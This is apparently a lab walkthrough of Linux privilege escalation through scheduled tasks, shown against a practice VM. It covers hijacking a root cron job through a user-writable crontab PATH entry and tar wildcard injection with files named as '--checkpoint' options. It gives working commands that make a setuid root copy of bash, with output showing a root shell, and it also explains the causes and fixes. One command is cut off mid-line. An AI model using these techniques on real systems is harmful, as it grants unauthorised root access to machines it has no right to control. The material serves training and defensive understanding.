Scheduled tasks

  • Cron Path

  • Cron wildcard

Cron Path escalation

user@debian:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin  <----------------

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh

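Two things make this possible: the crontab PATH begins with /home/user, a directory the unprivileged user can write to, and the root job overwrite.sh is called by bare name, so cron resolves it through that PATH. Removing user-writable directories from the crontab PATH closes this; calling every job by absolute path is a further safeguard.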

PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin  <----------------
     ^^^^^^^^^^
* * * * * root overwrite.sh <------- a missing file
* * * * * root /usr/local/bin/compress.sh

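Because /home/user is searched first, an overwrite.sh created in that directory is the one root's cron job runs. The script used here copies bash to /tmp and sets the setuid/setgid bits on the copy: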

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
chmod +x /home/user/overwrite.sh

user@debian:~$ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
user@debian:~$ chmod +x overwrite.sh
user@debian:~$ ls -la /tmp
total 1108
drwxrwxrwt  2 root root   4096 Mar 10 13:06 .
drwxr-xr-x 22 root root   4096 Jun 17  2020 ..
-rw-r--r--  1 root root 181541 Mar 10 13:06 backup.tar.gz
-rwsr-sr-x  1 root root 926536 Mar 10 13:06 bash
-rw-r--r--  1 root root     29 Mar 10 13:05 useless
TCM@debian:~$ /tmp/bash -p
bash-4.1# id
uid=1000(TCM) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)

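Cron wildcard escalation

The commands below only have an effect if a privileged job (presumably a root cron job, not shown on this page) runs tar with a `*` wildcard in /home/andre/backup: the shell expands `*` to the file names, and tar treats names beginning with `--checkpoint` as its own options. A job that passes `--` or `./*` before the expanded names is not affected. The beginning of the first command is cut off in this copy.

ash /tmp/bash; chmod +s /tmp/bash' > /home/andre/backup/runme.sh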


touch /home/andre/backup/--checkpoint=1
touch /home/andre/backup/--checkpoint-action=exec=sh\ runme.sh
